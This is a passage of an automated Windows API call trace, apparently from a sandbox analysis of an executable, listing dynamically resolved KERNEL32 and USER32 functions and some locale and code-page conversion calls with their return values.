lpProcName="GetSystemDirectoryA") returned 0x75cbb66c [0162.663] GetProcAddress (hModule=0x75c90000, lpProcName="GetCurrentDirectoryA") returned 0x75ccd4f6 [0162.663] GetProcAddress (hModule=0x75c90000, lpProcName="CreateFileA") returned 0x75ca53c6 [0162.663] GetProcAddress (hModule=0x75c90000, lpProcName="GetFileAttributesW") returned 0x75ca1b18 [0162.663] GetProcAddress (hModule=0x75c90000, lpProcName="GetComputerNameA") returned 0x75cbb6e0 [0162.663] GetProcAddress (hModule=0x75c90000, lpProcName="GetACP") returned 0x75ca179c [0162.663] GetProcAddress (hModule=0x75c90000, lpProcName="GetOEMCP") returned 0x75ccd1a1 [0162.663] GetProcAddress (hModule=0x75c90000, lpProcName="GetDateFormatW") returned 0x75cc34d7 [0162.663] GetProcAddress (hModule=0x75c90000, lpProcName="GetThreadLocale") returned 0x75ca35cf [0162.664] GetProcAddress (hModule=0x75c90000, lpProcName="GenerateConsoleCtrlEvent") returned 0x75d47a5f [0162.664] GetProcAddress (hModule=0x75c90000, lpProcName="CreateToolhelp32Snapshot") returned 0x75cc735f [0162.664] GetProcAddress (hModule=0x75c90000, lpProcName="Process32FirstW") returned 0x75cc8baf [0162.664] GetProcAddress (hModule=0x75c90000, lpProcName="Process32NextW") returned 0x75cc896c [0162.664] GetProcAddress (hModule=0x75c90000, lpProcName="MultiByteToWideChar") returned 0x75ca192e [0162.664] GetProcAddress (hModule=0x75c90000, lpProcName="WideCharToMultiByte") returned 0x75ca170d [0162.664] GetProcAddress (hModule=0x75c90000, lpProcName="SetLastError") returned 0x75ca11a9 [0162.664] GetProcAddress (hModule=0x75c90000, lpProcName="WriteFile") returned 0x75ca1282 [0162.664] GetProcAddress (hModule=0x75c90000, lpProcName="WaitForSingleObject") returned 0x75ca1136 [0162.665] GetProcAddress (hModule=0x75c90000, lpProcName="CreateFileW") returned 0x75ca3f5c [0162.665] GetProcAddress (hModule=0x75c90000, lpProcName="GetCurrentThreadId") returned 0x75ca1450 [0162.665] GetProcAddress (hModule=0x75c90000, lpProcName="GetSystemDirectoryW") returned 0x75ca5063 [0162.665] GetProcAddress (hModule=0x75c90000, lpProcName="OpenProcess") returned 0x75ca1986 [0162.665] GetProcAddress (hModule=0x75c90000, lpProcName="lstrcatW") returned 0x75cc828e [0162.665] GetProcAddress (hModule=0x75c90000, lpProcName="LoadLibraryW") returned 0x75ca492b [0162.665] GetProcAddress (hModule=0x75c90000, lpProcName="FreeLibrary") returned 0x75ca34c8 [0162.665] GetProcAddress (hModule=0x75c90000, lpProcName="WaitNamedPipeW") returned 0x75d245df [0162.665] GetProcAddress (hModule=0x75c90000, lpProcName="GetExitCodeProcess") returned 0x75cb174d [0162.666] GetProcAddress (hModule=0x75c90000, lpProcName="GetTickCount") returned 0x75ca110c [0162.666] GetProcAddress (hModule=0x75c90000, lpProcName="GetVersionExW") returned 0x75ca1ae5 [0162.666] GetProcAddress (hModule=0x75c90000, lpProcName="LocalFree") returned 0x75ca2d3c [0162.666] GetProcAddress (hModule=0x75c90000, lpProcName="lstrcmpiW") returned 0x75cbd5cd [0162.666] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleFileNameW") returned 0x75ca4950 [0162.666] GetProcAddress (hModule=0x75c90000, lpProcName="SizeofResource") returned 0x75ca5ac9 [0162.666] GetProcAddress (hModule=0x75c90000, lpProcName="LoadResource") returned 0x75ca594c [0162.666] GetProcAddress (hModule=0x75c90000, lpProcName="FindResourceW") returned 0x75ca5971 [0162.666] GetProcAddress (hModule=0x75c90000, lpProcName="LoadLibraryExW") returned 0x75ca495d [0162.666] GetProcAddress (hModule=0x75c90000, lpProcName="CreateThread") returned 0x75ca34d5 [0162.667] GetProcAddress (hModule=0x75c90000, lpProcName="GetCommandLineW") returned 0x75ca5223 [0162.667] GetProcAddress (hModule=0x75c90000, lpProcName="ExpandEnvironmentStringsW") returned 0x75ca4173 [0162.667] GetProcAddress (hModule=0x75c90000, lpProcName="InterlockedDecrement") returned 0x75ca13f0 [0162.667] GetProcAddress (hModule=0x75c90000, lpProcName="CreatePipe") returned 0x75d2415b [0162.667] GetProcAddress (hModule=0x75c90000, lpProcName="PeekNamedPipe") returned 0x75d24821 [0162.667] GetProcAddress (hModule=0x75c90000, lpProcName="GetEnvironmentVariableA") returned 0x75ca33a0 [0162.667] GetProcAddress (hModule=0x75c90000, lpProcName="GetTimeFormatA") returned 0x75cca842 [0162.667] GetProcAddress (hModule=0x75c90000, lpProcName="FreeResource") returned 0x75cbd3db [0162.667] GetProcAddress (hModule=0x75c90000, lpProcName="GetDateFormatA") returned 0x75cca959 [0162.668] GetProcAddress (hModule=0x75c90000, lpProcName="MoveFileExW") returned 0x75cb9b2d [0162.668] GetProcAddress (hModule=0x75c90000, lpProcName="CreateProcessW") returned 0x75ca103d [0162.668] GetProcAddress (hModule=0x75c90000, lpProcName="lstrcmpA") returned 0x75cbeceb [0162.668] GetProcAddress (hModule=0x75c90000, lpProcName="lstrcmpiA") returned 0x75ca3e8e [0162.668] GetProcAddress (hModule=0x75c90000, lpProcName="GlobalAlloc") returned 0x75ca588e [0162.668] GetProcAddress (hModule=0x75c90000, lpProcName="GlobalLock") returned 0x75cbd0a7 [0162.668] GetProcAddress (hModule=0x75c90000, lpProcName="InterlockedIncrement") returned 0x75ca1400 [0162.668] GetProcAddress (hModule=0x75c90000, lpProcName="GlobalUnlock") returned 0x75cbcfdf [0162.668] GetProcAddress (hModule=0x75c90000, lpProcName="GetOverlappedResult") returned 0x75cbcc79 [0162.668] GetProcAddress (hModule=0x75c90000, lpProcName="GetFileSizeEx") returned 0x75ca59e2 [0162.669] GetProcAddress (hModule=0x75c90000, lpProcName="SetEndOfFile") returned 0x75cbce2e [0162.669] GetProcAddress (hModule=0x75c90000, lpProcName="DeleteFileW") returned 0x75ca89b3 [0162.669] GetProcAddress (hModule=0x75c90000, lpProcName="MoveFileW") returned 0x75cb9af0 [0162.669] GetProcAddress (hModule=0x75c90000, lpProcName="GetDriveTypeW") returned 0x75ca418b [0162.669] GetProcAddress (hModule=0x75c90000, lpProcName="SetFileTime") returned 0x75cbecbb [0162.669] GetProcAddress (hModule=0x75c90000, lpProcName="ProcessIdToSessionId") returned 0x75ca1275 [0162.669] GetProcAddress (hModule=0x75c90000, lpProcName="SleepEx") returned 0x75ca1215 [0162.669] GetProcAddress (hModule=0x75c90000, lpProcName="GetFileTime") returned 0x75ca4407 [0162.669] GetProcAddress (hModule=0x75c90000, lpProcName="GetLogicalDrives") returned 0x75ca5371 [0162.670] GetProcAddress (hModule=0x75c90000, lpProcName="FindFirstFileW") returned 0x75ca4435 [0162.670] GetProcAddress (hModule=0x75c90000, lpProcName="FindNextFileW") returned 0x75ca54ee [0162.670] GetProcAddress (hModule=0x75c90000, lpProcName="RemoveDirectoryW") returned 0x75d244cf [0162.670] GetProcAddress (hModule=0x75c90000, lpProcName="FindClose") returned 0x75ca4442 [0162.670] GetProcAddress (hModule=0x75c90000, lpProcName="SetFileAttributesW") returned 0x75cbd4f7 [0162.670] GetProcAddress (hModule=0x75c90000, lpProcName="lstrlenA") returned 0x75ca5a4b [0162.670] GetProcAddress (hModule=0x75c90000, lpProcName="QueryPerformanceFrequency") returned 0x75ca41f0 [0162.670] GetProcAddress (hModule=0x75c90000, lpProcName="QueryPerformanceCounter") returned 0x75ca1725 [0162.670] GetProcAddress (hModule=0x75c90000, lpProcName="OpenEventW") returned 0x75ca15d6 [0162.670] GetProcAddress (hModule=0x75c90000, lpProcName="CreateEventW") returned 0x75ca183e [0162.671] GetProcAddress (hModule=0x75c90000, lpProcName="SetEvent") returned 0x75ca16c5 [0162.671] GetProcAddress (hModule=0x75c90000, lpProcName="TryEnterCriticalSection") returned 0x77d62500 [0162.671] GetProcAddress (hModule=0x75c90000, lpProcName="EnterCriticalSection") returned 0x77d522b0 [0162.671] GetProcAddress (hModule=0x75c90000, lpProcName="InitializeCriticalSection") returned 0x77d62c42 [0162.671] GetProcAddress (hModule=0x75c90000, lpProcName="DeleteCriticalSection") returned 0x77d645f5 [0162.671] GetProcAddress (hModule=0x75c90000, lpProcName="SetUnhandledExceptionFilter") returned 0x75ca87c9 [0162.671] GetProcAddress (hModule=0x75c90000, lpProcName="GetFileSize") returned 0x75ca196e [0162.671] GetProcAddress (hModule=0x75c90000, lpProcName="LocalAlloc") returned 0x75ca168c [0162.671] GetProcAddress (hModule=0x75c90000, lpProcName="FileTimeToSystemTime") returned 0x75ca542c [0162.672] GetProcAddress (hModule=0x75c90000, lpProcName="GetCurrentThread") returned 0x75ca17ec [0162.672] GetProcAddress (hModule=0x75c90000, lpProcName="GetSystemInfo") returned 0x75ca49ca [0162.672] GetProcAddress (hModule=0x75c90000, lpProcName="GetComputerNameW") returned 0x75cadd0e [0162.672] GetProcAddress (hModule=0x75c90000, lpProcName="GetSystemTimeAsFileTime") returned 0x75ca3509 [0162.675] GetProcAddress (hModule=0x75c90000, lpProcName="TlsSetValue") returned 0x75ca14fb [0162.675] GetProcAddress (hModule=0x75c90000, lpProcName="SetThreadPriority") returned 0x75ca32bb [0162.675] GetProcAddress (hModule=0x75c90000, lpProcName="ResumeThread") returned 0x75ca43ef [0162.675] GetProcAddress (hModule=0x75c90000, lpProcName="DuplicateHandle") returned 0x75ca1886 [0162.675] GetProcAddress (hModule=0x75c90000, lpProcName="TlsAlloc") returned 0x75ca49ad [0162.675] GetProcAddress (hModule=0x75c90000, lpProcName="CreateSemaphoreW") returned 0x75cbca5a [0162.676] GetProcAddress (hModule=0x75c90000, lpProcName="TlsGetValue") returned 0x75ca11e0 [0162.676] GetProcAddress (hModule=0x75c90000, lpProcName="RaiseException") returned 0x75ca58a6 [0162.676] GetProcAddress (hModule=0x75c90000, lpProcName="TerminateProcess") returned 0x75cbd802 [0162.676] GetProcAddress (hModule=0x75c90000, lpProcName="ExitProcess") returned 0x75ca7a10 [0162.676] GetProcAddress (hModule=0x75c90000, lpProcName="GetCurrentProcessId") returned 0x75ca11f8 [0162.676] GetProcAddress (hModule=0x75c90000, lpProcName="GetCurrentProcess") returned 0x75ca1809 [0162.676] GetProcAddress (hModule=0x75c90000, lpProcName="LocalSize") returned 0x75cbe741 [0162.676] GetProcAddress (hModule=0x75c90000, lpProcName="GlobalCompact") returned 0x75d1efc6 [0162.676] GetProcAddress (hModule=0x75c90000, lpProcName="GlobalSize") returned 0x75cbd16f [0162.676] GetProcAddress (hModule=0x75c90000, lpProcName="GetProcAddress") returned 0x75ca1222 [0162.677] GetProcAddress (hModule=0x75c90000, lpProcName="LockResource") returned 0x75ca5959 [0162.677] GetProcAddress (hModule=0x75c90000, lpProcName="DecodePointer") returned 0x77d69d35 [0162.677] GetProcAddress (hModule=0x75c90000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x75ca1916 [0162.677] GetProcAddress (hModule=0x75c90000, lpProcName="CompareStringW") returned 0x75ca3bca [0162.677] GetProcAddress (hModule=0x75c90000, lpProcName="LCMapStringW") returned 0x75ca17b9 [0162.677] GetProcAddress (hModule=0x75c90000, lpProcName="GetLocaleInfoW") returned 0x75ca3c42 [0162.677] GetProcAddress (hModule=0x75c90000, lpProcName="GetCPInfo") returned 0x75ca5189 [0162.677] GetProcAddress (hModule=0x75c90000, lpProcName="UnhandledExceptionFilter") returned 0x75cc772f [0162.677] GetProcAddress (hModule=0x75c90000, lpProcName="IsProcessorFeaturePresent") returned 0x75ca5235 [0162.677] GetProcAddress (hModule=0x75c90000, lpProcName="WaitForSingleObjectEx") returned 0x75ca1151 [0162.678] GetProcAddress (hModule=0x75c90000, lpProcName="GetStartupInfoW") returned 0x75ca4d40 [0162.678] GetProcAddress (hModule=0x75c90000, lpProcName="GetLastError") returned 0x75ca11c0 [0162.678] GetProcAddress (hModule=0x75c90000, lpProcName="CreateDirectoryW") returned 0x75ca4259 [0162.678] GetProcAddress (hModule=0x75c90000, lpProcName="TerminateThread") returned 0x75ca7a2f [0162.678] GetProcAddress (hModule=0x75c90000, lpProcName="InitializeSListHead") returned 0x77d694a4 [0162.678] GetProcAddress (hModule=0x75c90000, lpProcName="RtlUnwind") returned 0x75ccd1c3 [0162.678] GetProcAddress (hModule=0x75c90000, lpProcName="GetFileType") returned 0x75ca3531 [0162.678] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandleExW") returned 0x75ca4a6f [0162.678] GetProcAddress (hModule=0x75c90000, lpProcName="ExitThread") returned 0x77d8d598 [0162.679] GetProcAddress (hModule=0x75c90000, lpProcName="FreeLibraryAndExitThread") returned 0x75cbd582 [0162.679] GetProcAddress (hModule=0x75c90000, lpProcName="HeapAlloc") returned 0x77d5e026 [0162.679] GetProcAddress (hModule=0x75c90000, lpProcName="HeapReAlloc") returned 0x77d71f6e [0162.679] GetProcAddress (hModule=0x75c90000, lpProcName="HeapFree") returned 0x75ca14c9 [0162.679] GetProcAddress (hModule=0x75c90000, lpProcName="GetStdHandle") returned 0x75ca51b3 [0162.679] GetProcAddress (hModule=0x75c90000, lpProcName="FlushFileBuffers") returned 0x75ca469b [0162.679] GetProcAddress (hModule=0x75c90000, lpProcName="GetConsoleCP") returned 0x75d47bff [0162.679] GetProcAddress (hModule=0x75c90000, lpProcName="GetConsoleMode") returned 0x75ca1328 [0162.679] GetProcAddress (hModule=0x75c90000, lpProcName="IsValidLocale") returned 0x75cbce46 [0162.679] GetProcAddress (hModule=0x75c90000, lpProcName="GetUserDefaultLCID") returned 0x75ca3da5 [0162.680] GetProcAddress (hModule=0x75c90000, lpProcName="EnumSystemLocalesW") returned 0x75d2425f [0162.680] GetProcAddress (hModule=0x75c90000, lpProcName="SetFilePointerEx") returned 0x75cbc807 [0162.680] GetProcAddress (hModule=0x75c90000, lpProcName="ReadConsoleW") returned 0x75d4739a [0162.680] GetProcAddress (hModule=0x75c90000, lpProcName="SetStdHandle") returned 0x75d2454f [0162.680] GetProcAddress (hModule=0x75c90000, lpProcName="GetProcessHeap") returned 0x75ca14e9 [0162.680] GetProcAddress (hModule=0x75c90000, lpProcName="FindFirstFileExA") returned 0x75d2427f [0162.680] GetProcAddress (hModule=0x75c90000, lpProcName="FindNextFileA") returned 0x75ccd53e [0162.680] GetProcAddress (hModule=0x75c90000, lpProcName="IsValidCodePage") returned 0x75ca4493 [0162.680] GetProcAddress (hModule=0x75c90000, lpProcName="GetCommandLineA") returned 0x75ca51a1 [0162.681] GetProcAddress (hModule=0x75c90000, lpProcName="GetStringTypeW") returned 0x75ca1946 [0162.681] GetProcAddress (hModule=0x75c90000, lpProcName="GetEnvironmentStringsW") returned 0x75ca51e3 [0162.681] GetProcAddress (hModule=0x75c90000, lpProcName="FreeEnvironmentStringsW") returned 0x75ca51cb [0162.681] GetProcAddress (hModule=0x75c90000, lpProcName="SetEnvironmentVariableA") returned 0x75cae331 [0162.681] GetProcAddress (hModule=0x75c90000, lpProcName="WriteConsoleW") returned 0x75cc7aca [0162.681] GetProcAddress (hModule=0x75c90000, lpProcName="SetHandleInformation") returned 0x75cb195c [0162.681] GetProcAddress (hModule=0x75c90000, lpProcName="HeapSize") returned 0x77d63002 [0162.681] GetProcAddress (hModule=0x75c90000, lpProcName="EncodePointer") returned 0x77d70fcb [0162.681] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76780000 [0162.681] GetProcAddress (hModule=0x76780000, lpProcName="SetClipboardData") returned 0x767d8e57 [0162.682] GetProcAddress (hModule=0x76780000, lpProcName="GetUserObjectInformationW") returned 0x76798068 [0162.682] GetProcAddress (hModule=0x76780000, lpProcName="SetWindowLongW") returned 0x76798332 [0162.682] GetProcAddress (hModule=0x76780000, lpProcName="PostQuitMessage") returned 0x76799abb [0162.682] GetProcAddress (hModule=0x76780000, lpProcName="GetDesktopWindow") returned 0x767a0a19 [0162.682] GetProcAddress (hModule=0x76780000, lpProcName="GetCursorPos") returned 0x767a1218 [0162.682] GetProcAddress (hModule=0x76780000, lpProcName="VkKeyScanExW") returned 0x767acd66 [0162.682] GetProcAddress (hModule=0x76780000, lpProcName="MapVirtualKeyW") returned 0x767c1459 [0162.682] GetProcAddress (hModule=0x76780000, lpProcName="GetAsyncKeyState") returned 0x767beb96 [0162.682] GetProcAddress (hModule=0x76780000, lpProcName="LoadKeyboardLayoutW") returned 0x767dbb17 [0162.683] GetProcAddress (hModule=0x76780000, lpProcName="SendMessageTimeoutW") returned 0x767997d2 [0162.683] GetProcAddress (hModule=0x76780000, lpProcName="SystemParametersInfoW") returned 0x767990d3 [0162.683] GetProcAddress (hModule=0x76780000, lpProcName="keybd_event") returned 0x767f02bf [0162.683] GetProcAddress (hModule=0x76780000, lpProcName="GetSystemMetrics") returned 0x76797d2f [0162.683] GetProcAddress (hModule=0x76780000, lpProcName="SetThreadDesktop") returned 0x767a0296 [0162.683] GetProcAddress (hModule=0x76780000, lpProcName="GetKeyboardState") returned 0x767bec68 [0162.683] GetProcAddress (hModule=0x76780000, lpProcName="ExitWindowsEx") returned 0x767e1497 [0162.683] GetProcAddress (hModule=0x76780000, lpProcName="mouse_event") returned 0x767f027b [0162.683] GetProcAddress (hModule=0x76780000, lpProcName="DestroyWindow") returned 0x76799a55 [0162.683] GetProcAddress (hModule=0x76780000, lpProcName="CreateWindowExW") returned 0x76798a29 [0162.684] GetProcAddress (hModule=0x76780000, lpProcName="RegisterClassExW") returned 0x7679b17d [0162.684] GetProcAddress (hModule=0x76780000, lpProcName="PeekMessageW") returned 0x767a05ba [0162.684] GetProcAddress (hModule=0x76780000, lpProcName="DefWindowProcA") returned 0x77d724e0 [0162.684] GetProcAddress (hModule=0x76780000, lpProcName="GetMessageW") returned 0x767978e2 [0162.684] GetProcAddress (hModule=0x76780000, lpProcName="PostThreadMessageW") returned 0x76798bff [0162.684] GetProcAddress (hModule=0x76780000, lpProcName="WinHelpW") returned 0x767e8a63 [0162.684] GetProcAddress (hModule=0x76780000, lpProcName="LoadImageW") returned 0x7679fbd1 [0162.684] GetProcAddress (hModule=0x76780000, lpProcName="LoadCursorA") returned 0x7679dad5 [0162.684] GetProcAddress (hModule=0x76780000, lpProcName="GetWindowThreadProcessId") returned 0x767991b4 [0162.684] GetProcAddress (hModule=0x76780000, lpProcName="GetClipboardData") returned 0x767d9f1d [0162.685] GetProcAddress (hModule=0x76780000, lpProcName="FindWindowA") returned 0x7679ffe6 [0162.685] GetProcAddress (hModule=0x76780000, lpProcName="SetWindowLongA") returned 0x767a6110 [0162.685] GetProcAddress (hModule=0x76780000, lpProcName="DrawFocusRect") returned 0x767a89c2 [0162.685] GetProcAddress (hModule=0x76780000, lpProcName="GetSysColorBrush") returned 0x767a35a4 [0162.685] GetProcAddress (hModule=0x76780000, lpProcName="MessageBeep") returned 0x767ac036 [0162.685] GetProcAddress (hModule=0x76780000, lpProcName="MessageBoxA") returned 0x767efd1e [0162.685] GetProcAddress (hModule=0x76780000, lpProcName="GetWindowRect") returned 0x76797f34 [0162.685] GetProcAddress (hModule=0x76780000, lpProcName="GetWindowTextA") returned 0x767a0029 [0162.685] GetProcAddress (hModule=0x76780000, lpProcName="SetWindowTextA") returned 0x767a7aee [0162.686] GetProcAddress (hModule=0x76780000, lpProcName="GetForegroundWindow") returned 0x767a2320 [0162.686] GetProcAddress (hModule=0x76780000, lpProcName="SetActiveWindow") returned 0x767a3208 [0162.686] GetProcAddress (hModule=0x76780000, lpProcName="DeleteMenu") returned 0x767a6d2a [0162.686] GetProcAddress (hModule=0x76780000, lpProcName="DestroyMenu") returned 0x767a3e26 [0162.686] GetProcAddress (hModule=0x76780000, lpProcName="GetMenuState") returned 0x767aa7c1 [0162.686] GetProcAddress (hModule=0x76780000, lpProcName="GetMenu") returned 0x767a5041 [0162.686] GetProcAddress (hModule=0x76780000, lpProcName="TranslateAcceleratorA") returned 0x767a85e5 [0162.686] GetProcAddress (hModule=0x76780000, lpProcName="LoadAcceleratorsA") returned 0x767a84cb [0162.686] GetProcAddress (hModule=0x76780000, lpProcName="KillTimer") returned 0x767979db [0162.686] GetProcAddress (hModule=0x76780000, lpProcName="SetTimer") returned 0x767979fb [0162.687] GetProcAddress (hModule=0x76780000, lpProcName="CharNextA") returned 0x76797a1b [0162.687] GetProcAddress (hModule=0x76780000, lpProcName="CharUpperBuffW") returned 0x7679fc5d [0162.687] GetProcAddress (hModule=0x76780000, lpProcName="IsClipboardFormatAvailable") returned 0x767a8676 [0162.687] GetProcAddress (hModule=0x76780000, lpProcName="SendDlgItemMessageW") returned 0x767bd0f5 [0162.687] GetProcAddress (hModule=0x76780000, lpProcName="IsZoomed") returned 0x767a3332 [0162.695] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0162.695] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18ee98, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0162.695] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18f874, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x94\xed\x18\xe9\xb0\xfa\x18", lpUsedDefaultChar=0x0) returned 256 [0162.695] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f974, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0162.695] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f974, cbMultiByte=256, lpWideCharStr=0x18f0c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0162.695] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 